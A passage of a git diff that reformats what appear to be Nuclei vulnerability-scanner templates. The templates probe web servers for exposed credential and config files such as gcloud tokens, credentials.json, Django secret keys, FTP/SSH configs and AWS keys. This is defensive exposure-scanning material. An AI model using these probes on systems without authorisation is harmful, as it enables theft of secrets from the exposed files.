discloses the application's Adminpassword and Password. + reference: + - https://www.ventrilo.com/setup.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://www.ventrilo.com/setup.php metadata: - max-request: 1 verified: true + max-request: 1 tags: ventrilo,config,exposure http: diff --git a/http/exposures/configs/web-config.yaml b/http/exposures/configs/web-config.yaml index f9cbf60491..6a491d389f 100644 --- a/http/exposures/configs/web-config.yaml +++ b/http/exposures/configs/web-config.yaml @@ -9,11 +9,11 @@ info: - https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 2 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/webpack-config.yaml b/http/exposures/configs/webpack-config.yaml index 2350677718..6d0c5a6664 100644 --- a/http/exposures/configs/webpack-config.yaml +++ b/http/exposures/configs/webpack-config.yaml @@ -7,7 +7,7 @@ info: description: Webpack configuration file was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposures/configs/websheets-config.yaml b/http/exposures/configs/websheets-config.yaml index 3fd3451bc6..988aae51c1 100644 --- a/http/exposures/configs/websheets-config.yaml +++ b/http/exposures/configs/websheets-config.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: high description: Websheets configuration file was detected. + reference: + - https://github.com/daveagp/websheets classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://github.com/daveagp/websheets metadata: - max-request: 2 verified: true + max-request: 2 tags: websheets,config,exposure,files http: @@ -23,6 +23,7 @@ http: - '{{BaseURL}}/ws-config.example.json' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/wgetrc-config.yaml b/http/exposures/configs/wgetrc-config.yaml index 42d94d54a0..f7c8434c7c 100644 --- a/http/exposures/configs/wgetrc-config.yaml +++ b/http/exposures/configs/wgetrc-config.yaml @@ -8,11 +8,11 @@ info: reference: https://www.gnu.org/software/wget/manual/html_node/Wgetrc-Commands.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:".wgetrc" tags: devops,exposure @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/.wgetrc" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/wpconfig-aws-keys.yaml b/http/exposures/configs/wpconfig-aws-keys.yaml index ca42c3dd2d..b99d619fed 100644 --- a/http/exposures/configs/wpconfig-aws-keys.yaml +++ b/http/exposures/configs/wpconfig-aws-keys.yaml @@ -4,9 +4,9 @@ info: name: AWS S3 keys Leak author: r12w4n severity: high - tags: aws,s3,wordpress,disclosure,exposure metadata: max-request: 2 + tags: aws,s3,wordpress,disclosure,exposure http: - method: GET diff --git a/http/exposures/configs/xprober-service.yaml b/http/exposures/configs/xprober-service.yaml index 3c73ef238f..526b75b9da 100644 --- a/http/exposures/configs/xprober-service.yaml +++ b/http/exposures/configs/xprober-service.yaml @@ -5,21 +5,22 @@ info: author: pdteam severity: medium description: X Prober Server information disclosure was detected. + reference: + - https://github.com/kmvan/x-prober + - https://twitter.com/bugbounty_tips/status/1339984643517423616 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://github.com/kmvan/x-prober - - https://twitter.com/bugbounty_tips/status/1339984643517423616 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET path: - "{{BaseURL}}/xprober.php" + matchers: - type: word words: diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml index d17dd46607..40c16ea4b5 100644 --- a/http/exposures/configs/yii-debugger.yaml +++ b/http/exposures/configs/yii-debugger.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - tags: yii,debug,exposure metadata: max-request: 5 + tags: yii,debug,exposure http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/exposures/configs/zend-config-file.yaml b/http/exposures/configs/zend-config-file.yaml index 4529c46d80..2e9d258e19 100644 --- a/http/exposures/configs/zend-config-file.yaml +++ b/http/exposures/configs/zend-config-file.yaml @@ -4,9 +4,9 @@ info: name: Zend Configuration File author: pdteam,geeknik,Akokonunes severity: high - tags: config,exposure,zend,php metadata: max-request: 13 + tags: config,exposure,zend,php http: - method: GET @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/slr/application/configs/application.ini" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposures/files/angular-json.yaml b/http/exposures/files/angular-json.yaml index 30b2e4f8f8..2100cfffeb 100644 --- a/http/exposures/files/angular-json.yaml +++ b/http/exposures/files/angular-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: - html:"angular.json" - html:"angular-cli.json" @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/.angular.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/apache-licenserc.yaml b/http/exposures/files/apache-licenserc.yaml index 63317cbbad..32d06c55c3 100644 --- a/http/exposures/files/apache-licenserc.yaml +++ b/http/exposures/files/apache-licenserc.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 tags: exposure,file,apache http: diff --git a/http/exposures/files/appsettings-file-disclosure.yaml b/http/exposures/files/appsettings-file-disclosure.yaml index 868af00d0e..702110a196 100644 --- a/http/exposures/files/appsettings-file-disclosure.yaml +++ b/http/exposures/files/appsettings-file-disclosure.yaml @@ -9,8 +9,8 @@ info: reference: - https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag metadata: - max-request: 2 verified: true + max-request: 2 tags: exposure,files http: @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/appsettings.Production.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/atom-sync-remote.yaml b/http/exposures/files/atom-sync-remote.yaml index 9d8edd1b03..902c80816b 100644 --- a/http/exposures/files/atom-sync-remote.yaml +++ b/http/exposures/files/atom-sync-remote.yaml @@ -7,8 +7,8 @@ info: description: | It discloses username and password created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials metadata: - max-request: 1 verified: true + max-request: 1 tags: atom,exposure,config,files http: diff --git a/http/exposures/files/axis-happyaxis.yaml b/http/exposures/files/axis-happyaxis.yaml index 9653239a86..2c2e1db62b 100644 --- a/http/exposures/files/axis-happyaxis.yaml +++ b/http/exposures/files/axis-happyaxis.yaml @@ -4,9 +4,9 @@ info: name: Axis Happyaxis Exposure author: dogasantos severity: info - tags: axis,axis2,middleware,exposure,apache,files metadata: max-request: 4 + tags: axis,axis2,middleware,exposure,apache,files http: - method: GET @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/happyaxis.jsp" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml index 3dc9a3c6b2..a900555f94 100644 --- a/http/exposures/files/azure-pipelines-exposed.yaml +++ b/http/exposures/files/azure-pipelines-exposed.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: medium metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"azure-pipelines.yml" tags: config,exposure,azure,microsoft,cloud,devops,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/azure-pipelines.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/bitbucket-pipelines.yaml b/http/exposures/files/bitbucket-pipelines.yaml index d52d9c76ff..9db0390377 100644 --- a/http/exposures/files/bitbucket-pipelines.yaml +++ b/http/exposures/files/bitbucket-pipelines.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"bitbucket-pipelines.yml" tags: exposure,bitbucket,devops,cicd,files diff --git a/http/exposures/files/bower-json.yaml b/http/exposures/files/bower-json.yaml index c13833b356..4ce23f692a 100644 --- a/http/exposures/files/bower-json.yaml +++ b/http/exposures/files/bower-json.yaml @@ -34,4 +34,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/files/build-properties.yaml b/http/exposures/files/build-properties.yaml index f5efcf2842..03e3451acb 100644 --- a/http/exposures/files/build-properties.yaml +++ b/http/exposures/files/build-properties.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "build.properties" tags: exposure,config,files @@ -18,6 +18,7 @@ http: - '{{BaseURL}}/manual/style/build.properties' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/bun-lock.yaml b/http/exposures/files/bun-lock.yaml index 5bbb5fec70..a28334391b 100644 --- a/http/exposures/files/bun-lock.yaml +++ b/http/exposures/files/bun-lock.yaml @@ -9,8 +9,8 @@ info: reference: - https://bun.sh/docs/install/lockfile metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body=="bun.lockb" tags: exposure,files,node,npm,bun diff --git a/http/exposures/files/cargo-lock-package.yaml b/http/exposures/files/cargo-lock-package.yaml index 4a3e257cbf..2aa07b7a4e 100644 --- a/http/exposures/files/cargo-lock-package.yaml +++ b/http/exposures/files/cargo-lock-package.yaml @@ -7,8 +7,8 @@ info: reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Cargo.lock" tags: exposure,files,cargo diff --git a/http/exposures/files/cargo-toml-file.yaml b/http/exposures/files/cargo-toml-file.yaml index fbf11926d8..ce1177dc8f 100644 --- a/http/exposures/files/cargo-toml-file.yaml +++ b/http/exposures/files/cargo-toml-file.yaml @@ -7,8 +7,8 @@ info: reference: - https://doc.rust-lang.org/cargo/reference/manifest.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Cargo.toml" tags: exposure,files,cargo diff --git a/http/exposures/files/cloud-config.yaml b/http/exposures/files/cloud-config.yaml index c0c47204ee..4f445d4465 100644 --- a/http/exposures/files/cloud-config.yaml +++ b/http/exposures/files/cloud-config.yaml @@ -6,8 +6,8 @@ info: severity: medium reference: https://www.exploit-db.com/ghdb/7959 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: html:"cloud-config.yml" tags: exposure,cloud,devops,files @@ -19,6 +19,7 @@ http: - '{{BaseURL}}/cloud-config.txt' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml index a34412660f..7bea00455d 100644 --- a/http/exposures/files/composer-auth-json.yaml +++ b/http/exposures/files/composer-auth-json.yaml @@ -6,8 +6,8 @@ info: severity: low reference: https://www.exploit-db.com/ghdb/5768 metadata: - max-request: 2 verified: true + max-request: 2 google-query: intext:"index of /" ".composer-auth.json" tags: exposure,devops,files @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/vendor/webmozart/assert/.composer-auth.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/core-dump.yaml b/http/exposures/files/core-dump.yaml index 07207680fd..1e00f30b5c 100644 --- a/http/exposures/files/core-dump.yaml +++ b/http/exposures/files/core-dump.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/hannob/snallygaster/blob/4c5a9b54501f64da96787c2a2e3a12ce2e09c1ab/snallygaster#L295 metadata: - max-request: 1 verified: true + max-request: 1 tags: exposure,files,core-dump http: diff --git a/http/exposures/files/credentials-json.yaml b/http/exposures/files/credentials-json.yaml index 813197ad54..35d1e89cfb 100644 --- a/http/exposures/files/credentials-json.yaml +++ b/http/exposures/files/credentials-json.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: medium metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "credentials.json" tags: google,secret,exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/assets/credentials.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/crossdomain-xml.yaml b/http/exposures/files/crossdomain-xml.yaml index f826602092..33e6a58eab 100644 --- a/http/exposures/files/crossdomain-xml.yaml +++ b/http/exposures/files/crossdomain-xml.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file - tags: exposure,generic,files metadata: max-request: 1 + tags: exposure,generic,files http: - method: GET @@ -20,6 +20,7 @@ http: - type: status status: - 200 + - type: word part: body words: diff --git a/http/exposures/files/database-credentials.yaml b/http/exposures/files/database-credentials.yaml index 5bbb8ee378..cc3cdc736f 100644 --- a/http/exposures/files/database-credentials.yaml +++ b/http/exposures/files/database-credentials.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:database_credentials.inc tags: exposure,database,config,files diff --git a/http/exposures/files/db-schema.yaml b/http/exposures/files/db-schema.yaml index 36ed185af6..3db82afd8d 100644 --- a/http/exposures/files/db-schema.yaml +++ b/http/exposures/files/db-schema.yaml @@ -5,9 +5,9 @@ info: author: geeknik severity: info description: This file is auto-generated from the current state of the database. - tags: exposure,backup,files metadata: max-request: 3 + tags: exposure,backup,files http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: word words: - "This file is auto-generated from the current state of the database." diff --git a/http/exposures/files/db-xml-file.yaml b/http/exposures/files/db-xml-file.yaml index fd293082e4..ffa82b969b 100644 --- a/http/exposures/files/db-xml-file.yaml +++ b/http/exposures/files/db-xml-file.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,db,files,exposure http: @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/dbeaver-database-connections.yaml b/http/exposures/files/dbeaver-database-connections.yaml index 5d1ad0aa71..d9e3fd60f2 100644 --- a/http/exposures/files/dbeaver-database-connections.yaml +++ b/http/exposures/files/dbeaver-database-connections.yaml @@ -9,11 +9,11 @@ info: - https://dbeaver.com/docs/wiki/Admin-Manage-Connections/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: dbeaver,files,exposure http: diff --git a/http/exposures/files/django-secret-key.yaml b/http/exposures/files/django-secret-key.yaml index e34bff6dc1..bd7906a685 100644 --- a/http/exposures/files/django-secret-key.yaml +++ b/http/exposures/files/django-secret-key.yaml @@ -7,8 +7,8 @@ info: description: The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file. reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: html:settings.py tags: django,exposure,files @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/web/settings/settings.py" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposures/files/docker-cloud.yaml b/http/exposures/files/docker-cloud.yaml index 58a92497ad..4b4733eedf 100644 --- a/http/exposures/files/docker-cloud.yaml +++ b/http/exposures/files/docker-cloud.yaml @@ -6,8 +6,8 @@ info: severity: medium reference: https://www.exploit-db.com/ghdb/7959 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"index of" "docker-cloud.yml" tags: exposure,cloud,devops,docker,files @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - '(?m)^ image:' diff --git a/http/exposures/files/domcfg-page.yaml b/http/exposures/files/domcfg-page.yaml index 5c81e7e1c9..eeda1f9889 100644 --- a/http/exposures/files/domcfg-page.yaml +++ b/http/exposures/files/domcfg-page.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://twitter.com/Wh11teW0lf/status/1295594085445709824 - tags: exposure,lotus,files metadata: max-request: 1 + tags: exposure,lotus,files http: - method: GET diff --git a/http/exposures/files/ds-store-file.yaml b/http/exposures/files/ds-store-file.yaml index 2d7eeb7719..f8379d32ef 100644 --- a/http/exposures/files/ds-store-file.yaml +++ b/http/exposures/files/ds-store-file.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://github.com/lijiejie/ds_store_exp - tags: exposure,files,ds_store,config metadata: max-request: 1 + tags: exposure,files,ds_store,config http: - method: GET @@ -19,7 +19,7 @@ http: matchers: - type: dsl dsl: - - "contains(body, '\x00@\x00')" + - "contains(body, '\0@\0')" - "contains(hex_encode(body), '0000000142756431')" condition: or @@ -31,4 +31,4 @@ http: dsl: - 'contains(to_lower(header), "accept-ranges: bytes")' - 'contains(to_lower(header), "octet-stream")' - condition: or \ No newline at end of file + condition: or diff --git a/http/exposures/files/dwsync-exposure.yaml b/http/exposures/files/dwsync-exposure.yaml index ca30a0e423..d4452d0975 100644 --- a/http/exposures/files/dwsync-exposure.yaml +++ b/http/exposures/files/dwsync-exposure.yaml @@ -7,9 +7,9 @@ info: description: The Dreamweaver file dwsync.xml was discovered. The dwsync.xml file is a file generated by Dreamweaver which contains information related to what files are in the website directory. classification: cwe-id: CWE-200 - tags: dwsync,exposure,dreamweaver,files metadata: max-request: 1 + tags: dwsync,exposure,dreamweaver,files http: - method: GET diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml index 696afebe78..aa83acc7ae 100644 --- a/http/exposures/files/environment-rb.yaml +++ b/http/exposures/files/environment-rb.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: medium metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "environment.rb" tags: ruby,devops,exposure,files @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/redmine/config/environment.rb" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/exposed-alps-spring.yaml b/http/exposures/files/exposed-alps-spring.yaml index 3911982a41..1fce8cf4b8 100644 --- a/http/exposures/files/exposed-alps-spring.yaml +++ b/http/exposures/files/exposed-alps-spring.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - tags: exposure,spring,files metadata: max-request: 3 + tags: exposure,spring,files http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" + matchers-condition: and matchers: - type: word @@ -25,10 +26,12 @@ http: - "profile" condition: and part: body + - type: word words: - "application/hal+json" part: header + - type: status status: - 200 diff --git a/http/exposures/files/filezilla.yaml b/http/exposures/files/filezilla.yaml index cdb5aa3b0d..3feace8d4c 100644 --- a/http/exposures/files/filezilla.yaml +++ b/http/exposures/files/filezilla.yaml @@ -4,9 +4,9 @@ info: name: Filezilla author: amsda severity: medium - tags: exposure,files metadata: max-request: 3 + tags: exposure,files http: - method: GET @@ -30,4 +30,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/files/ftpconfig.yaml b/http/exposures/files/ftpconfig.yaml index 3a18b150ae..e4ed6e63cc 100644 --- a/http/exposures/files/ftpconfig.yaml +++ b/http/exposures/files/ftpconfig.yaml @@ -3,11 +3,11 @@ id: ftpconfig info: name: Atom remote-ssh ftpconfig Exposure author: geeknik,DhiyaneshDK - description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials severity: high + description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:ftpconfig tags: atom,ftp,config,exposure,files diff --git a/http/exposures/files/gcloud-access-token.yaml b/http/exposures/files/gcloud-access-token.yaml index e009ad6115..6c568e10b3 100644 --- a/http/exposures/files/gcloud-access-token.yaml +++ b/http/exposures/files/gcloud-access-token.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: medium metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"access_tokens.db" tags: google,cloud,devops,exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/.config/gcloud/access_tokens.db" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/gcloud-credentials.yaml b/http/exposures/files/gcloud-credentials.yaml index 17abbcbd4f..d269a0b3f0 100644 --- a/http/exposures/files/gcloud-credentials.yaml +++ b/http/exposures/files/gcloud-credentials.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: medium metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"credentials.db" tags: google,cloud,devops,exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/.config/gcloud/credentials.db" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml index ae11acb83d..f1df92a7f5 100644 --- a/http/exposures/files/get-access-token-json.yaml +++ b/http/exposures/files/get-access-token-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "get_access_token.json" tags: exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml index c51326d19e..a7a7f3b20a 100644 --- a/http/exposures/files/git-mailmap.yaml +++ b/http/exposures/files/git-mailmap.yaml @@ -6,8 +6,8 @@ info: severity: low reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:mailmap tags: config,exposure,git,mailmap,files @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])" diff --git a/http/exposures/files/github-gemfile-files.yaml b/http/exposures/files/github-gemfile-files.yaml index 6278f195d6..8cb94e2e72 100644 --- a/http/exposures/files/github-gemfile-files.yaml +++ b/http/exposures/files/github-gemfile-files.yaml @@ -5,9 +5,9 @@ info: author: hahwul severity: info description: Find github page files(Gemfile / Gemfile.lock) - tags: github,exposure,files metadata: max-request: 2 + tags: github,exposure,files http: - method: GET @@ -31,4 +31,4 @@ http: - 'contains(body, "remote")' - 'contains(body, "specs")' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and diff --git a/http/exposures/files/github-page-config.yaml b/http/exposures/files/github-page-config.yaml index b66ca976bb..e759daaad4 100644 --- a/http/exposures/files/github-page-config.yaml +++ b/http/exposures/files/github-page-config.yaml @@ -5,9 +5,9 @@ info: author: hahwul severity: info description: Find github pages config file. - tags: github,exposure,config,files metadata: max-request: 1 + tags: github,exposure,config,files http: - method: GET diff --git a/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml index c5b68c6df2..d3d27a8217 100644 --- a/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -4,9 +4,9 @@ info: name: GLPI Status Domain Disclosure author: dogasantos severity: info - tags: glpi,exposure,status,files metadata: max-request: 3 + tags: glpi,exposure,status,files http: - method: GET diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml index ecaf6622d5..a8e8761141 100644 --- a/http/exposures/files/go-mod-disclosure.yaml +++ b/http/exposures/files/go-mod-disclosure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"go.mod" tags: exposure,files,go diff --git a/http/exposures/files/google-api-private-key.yaml b/http/exposures/files/google-api-private-key.yaml index 1d78f1b87a..bb549d65c3 100644 --- a/http/exposures/files/google-api-private-key.yaml +++ b/http/exposures/files/google-api-private-key.yaml @@ -6,8 +6,8 @@ info: severity: medium reference: https://www.exploit-db.com/ghdb/6037 metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "google-api-private-key.json" tags: exposure,cloud,google,devops,files @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/pimcore/app/config/pimcore/google-api-private-key.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/google-services-json.yaml b/http/exposures/files/google-services-json.yaml index e0fd0dc097..db4f05b31d 100644 --- a/http/exposures/files/google-services-json.yaml +++ b/http/exposures/files/google-services-json.yaml @@ -6,8 +6,8 @@ info: severity: low reference: https://www.exploit-db.com/ghdb/6886 metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "google-services.json" tags: google,cloud,exposure,files @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/android/app/google-services.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index 81e23bad6c..a3615dfed9 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 2 verified: true + max-request: 2 github-query: filename:libs.versions.toml tags: file,gradle,exposure @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/libs.versions.toml' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/iceflow-vpn-disclosure.yaml b/http/exposures/files/iceflow-vpn-disclosure.yaml index c7e28652c8..9ae2ad70dd 100644 --- a/http/exposures/files/iceflow-vpn-disclosure.yaml +++ b/http/exposures/files/iceflow-vpn-disclosure.yaml @@ -4,9 +4,9 @@ info: name: ICEFlow VPN Disclosure author: pikpikcu severity: low - tags: exposure,files,iceflow,logs metadata: max-request: 8 + tags: exposure,files,iceflow,logs http: - method: GET @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/log/firewall.log" max-size: 2048 + matchers-condition: and matchers: - type: word @@ -38,6 +39,6 @@ http: - type: word words: - "text/plain" - - "ICEFLOW" + - 'ICEFLOW' part: header condition: and diff --git a/http/exposures/files/idea-folder-exposure.yaml b/http/exposures/files/idea-folder-exposure.yaml index cab741e4f5..435b83b429 100644 --- a/http/exposures/files/idea-folder-exposure.yaml +++ b/http/exposures/files/idea-folder-exposure.yaml @@ -5,9 +5,9 @@ info: author: martincodes-de severity: info description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data. - tags: phpstorm,jetbrains,idea,exposure,files metadata: max-request: 2 + tags: phpstorm,jetbrains,idea,exposure,files http: - method: GET diff --git a/http/exposures/files/ioncube-loader-wizard.yaml b/http/exposures/files/ioncube-loader-wizard.yaml index c1ce11efe3..e6688a2142 100644 --- a/http/exposures/files/ioncube-loader-wizard.yaml +++ b/http/exposures/files/ioncube-loader-wizard.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: ioncube,disclosure,exposure metadata: max-request: 2 + tags: ioncube,disclosure,exposure http: - method: GET diff --git a/http/exposures/files/jetbrains-webservers.yaml b/http/exposures/files/jetbrains-webservers.yaml index 9899363677..e58e0c95d2 100644 --- a/http/exposures/files/jetbrains-webservers.yaml +++ b/http/exposures/files/jetbrains-webservers.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/ghdb/6648 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "WebServers.xml" tags: jetbrains,config,edb,files,exposure @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/.idea/webservers.xml" stop-at-first-match: true + 